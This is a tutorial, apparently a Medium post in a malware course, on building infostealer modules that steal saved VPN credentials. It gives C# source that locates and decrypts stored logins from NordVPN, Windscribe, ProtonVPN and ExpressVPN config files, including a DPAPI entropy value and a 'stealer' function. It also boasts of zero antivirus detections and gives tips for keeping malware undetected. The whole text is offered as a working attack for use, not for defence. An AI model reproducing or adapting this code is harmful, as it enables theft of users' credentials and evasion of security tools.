Lesson 8: Stealing VPN Accounts with Malware — Top 4 Popular + Source-Codes
Follow XIT on medium & UglyCompany on Telegram for more..
Below is the Topics List for Lesson 8:
8. VPN Accounts Theft:
⇢ NordVPN
⇢ WindscribeVPN
⇢ ProtonVPN
more… (ExpressVPN)
Many people and companies use virtual private networks (VPNs) to safeguard their online security and privacy. Credentials for VPN accounts make excellent targets for attackers looking to access sensitive information without authorization. In this lesson, we’ll demonstrate how to add functionality that can be able to steal VPN login information from well-known providers including NordVPN, WindscribeVPN, ProtonVPN, and more.
Topic 1: NordVPN
NordVPN is one of the most popular VPN services in the world. Using the below source-code you can write a function that can steal NordVPN credentials, allowing you to gain unauthorized access to VPN servers.
// nord
var nordVpnDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "NordVPN"));
if (!nordVpnDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var nordVpnExeDir in nordVpnDir.GetDirectories("NordVpn.exe*"))
{
foreach (var vpnVersionDir in nordVpnExeDir.GetDirectories())
{
var userConfigPath = Path.Combine(vpnVersionDir.FullName, "user.config");
if (!File.Exists(userConfigPath)) continue;
var doc = new XmlDocument();
doc.Load(userConfigPath);
var encodedUsername = doc.SelectSingleNode("//setting[@name='Username']/value")?.InnerText;
var encodedPassword = doc.SelectSingleNode("//setting[@name='Password']/value")?.InnerText;
if (!string.IsNullOrEmpty(encodedUsername) && !string.IsNullOrEmpty(encodedPassword))
{
var username = Decrypt(encodedUsername);
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "nord.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}Topic 2: WindscribeVPN
WindscribeVPN is another popular VPN service that offers both free and paid plans. Using the below source-code you can write a function that can steal WindscribeVPN credentials, giving you access to sensitive data protected by VPN.
// windscribe
var windscribeDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "Windscribe"));
if (!windscribeDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var accountFile in windscribeDir.GetFiles("OpenVPN_Configurations.xml", SearchOption.AllDirectories))
{
var doc = new XmlDocument();
doc.Load(accountFile.FullName);
var encodedUsername = doc.SelectSingleNode("//Configuration/UserInformation/Username")?.InnerText;
var encodedPassword = doc.SelectSingleNode("//Configuration/UserInformation/Password")?.InnerText;
if (!string.IsNullOrEmpty(encodedUsername) && !string.IsNullOrEmpty(encodedPassword))
{
var username = Decrypt(encodedUsername);
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "windscribe.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}Topic 3: ProtonVPN
ProtonVPN is a popular VPN service that emphasizes security and privacy. Using the below source-code you can write a function that can steal ProtonVPN credentials, allowing you to bypass its strong encryption and gain access to protected data.
// proton
var protonDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "ProtonVPN"));
if (!protonDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var accountFile in protonDir.GetFiles("Accounts.xml", SearchOption.AllDirectories))
{
var doc = XDocument.Load(accountFile.FullName);
var accountsElement = doc.Descendants("Accounts").FirstOrDefault();
if (accountsElement != null)
{
foreach (var accountElement in accountsElement.Descendants("Account"))
{
var username = accountElement.Element("Username")?.Value;
var encodedPassword = accountElement.Element("Password")?.Value;
if (!string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(encodedPassword))
{
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "proton.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}Topic 4: More VPN Services
Beyond NordVPN, WindscribeVPN, and ProtonVPN, there are many other VPN services with valuable credentials. Using the below source-code you can write a function that can steal credentials from other VPN services, giving you access to even more sensitive data.
A) ExpressVPN
private static readonly byte[] Entropy = { 0x50, 0x44, 0x46, 0x6d, 0x6d, 0x4d, 0x44, 0x5f, 0x7b, 0x40, 0x26, 0x7b, 0x34, 0x2b, 0x3d, 0x50, 0x3a, 0x3f, 0x49, 0x20, 0x26, 0x20, 0x5f, 0x23, 0x21, 0x40, 0x2e, 0x23, 0x27, 0x20, 0x2f };
private static string Decrypt(string encodedData)
{
try
{
var protectedData = Convert.FromBase64String(encodedData);
var unprotectedData = ProtectedData.Unprotect(protectedData, Entropy, DataProtectionScope.CurrentUser);
return Encoding.UTF8.GetString(unprotectedData);
}
catch
{
return "";
}
}
public static void Express_XITstealer()
{
var expressDir = new DirectoryInfo(Path.Combine(Paths.lappdata, "ExpressVPN"));
if (!expressDir.Exists) return;
try
{
var accounts = new StringBuilder();
foreach (var accountFile in expressDir.GetFiles("settings.xml", SearchOption.AllDirectories))
{
var doc = XDocument.Load(accountFile.FullName);
var accountsElement = doc.Descendants("UserConfig").FirstOrDefault()?.Element("AccountSettings");
if (accountsElement != null)
{
foreach (var accountElement in accountsElement.Descendants("Account"))
{
var username = accountElement.Element("Email")?.Value;
var encodedPassword = accountElement.Element("Password")?.Value;
if (!string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(encodedPassword))
{
var password = Decrypt(encodedPassword);
accounts.AppendLine($"Username: {username}\nPassword: {password}\n");
}
}
}
}
if (accounts.Length > 0)
{
var outputPath = Path.Combine(Directory.GetCurrentDirectory(), "express.txt");
File.WriteAllText(outputPath, accounts.ToString());
}
}
catch
{
// Handle exceptions here
}
}Finally, I compiled all the topics of lesson 8 & it was detected by 0 out of 26 antivirus scans. Below is the antivirus scan report from antiscan.me :
Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:
Conclusion
For attackers looking to get unauthorised access to sensitive information, stealing VPN account credentials is a powerful weapon. This class explained how to create malware that may be used to steal login information from well-known VPN providers including NordVPN, WindscribeVPN, and ProtonVPN. With this information, you may create malware programmes that are more effective and keep up with the most recent cybersecurity threats. Stay tuned for our next lesson, where we’ll explore how to add function to steal offline crypto wallets to take full control of user’s offline crypto wallet.
